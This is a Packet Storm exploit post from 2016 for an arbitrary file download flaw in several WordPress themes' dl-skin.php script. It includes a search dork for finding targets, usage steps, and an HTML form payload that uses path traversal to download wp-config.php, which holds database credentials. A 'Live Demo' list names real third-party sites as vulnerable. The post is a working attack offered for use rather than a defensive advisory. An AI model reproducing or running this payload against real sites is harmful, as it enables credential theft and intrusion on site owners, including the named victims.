WordPress Bonkersbeat / Method / Awake Arbitrary File Download

2016-08-23T00:00:00
ID PACKETSTORM:138480
Type packetstorm
Reporter xBADGIRL21
Modified 2016-08-23T00:00:00

Description

                                        
                                            `######################  
# Exploit Title : Wordpress Multi Themes Arbitrary File Download Vulnerability  
# Exploit Author : xBADGIRL21  
# Dork : wp-content/themes/ /lib/scripts/  
# Tested on: [ BackBox ]  
# skype:xbadgirl21  
# Date: 22/08/2016  
# video Proof : https://youtu.be/DFtF14_ShHk  
# Myblog : http://xbadgirl21.blogspot.com/  
######################  
# [+] DESCRIPTION :  
######################  
# [+] Wordpress Multi Themes Arbitrary File Download iT's an Exploit Allow Attackers to Download  
# [+] Files From Your Website and The Vulnerable File is : dl-skin.php  
# [+] so Any Theme Wordpress Has This File Then he is Potentially Vulnerable  
######################  
# [+] USAGE :  
1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1  
+ 1.- Use Dork Above  
[ok] +  
+ 2.- Download Exploit File Edit it  
[ok] +  
+ 3.- Edit:  
http://localhost/wp-content/themes/bonkersbeat/lib/scripts/dl-skin.php [ok]  
+  
+ 4.- Edit: the value you want To Download  
[ok] +  
+ 5.- Run  
Exploit  
+  
1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1  
######################  
# [+] Exploit:  
######################  
<html>  
<body>  
<form action="  
http://localhost/wp-content/themes/awake/lib/scripts/dl-skin.php"  
method="post">  
Download:<input type="text" name="_mysite_download_skin"  
value="../../../../../wp-config.php"><br>  
<input type="submit">  
</form>  
</body>  
</html>  
######################  
# [+] Live Demo :  
######################  
#  
http://www.bonkersbeat.com/wp-content/themes/bonkersbeat/lib/scripts/dl-skin.php  
# http://www.aemdum.ca/test/wp-content/themes/method/lib/scripts/dl-skin.php  
# http://www.tumct.org/wp-content/themes/awake/lib/scripts/dl-skin.php  
######################  
# Discovered by : xBADGIRL21  
# Greetz : All Mauritanien Hackers - NoWhere  
#######################  
### Note ### : Themes Vuln  
#######################  
# Vuln themes not all : https://ghostbin.com/paste/yg36k  
#######################  
`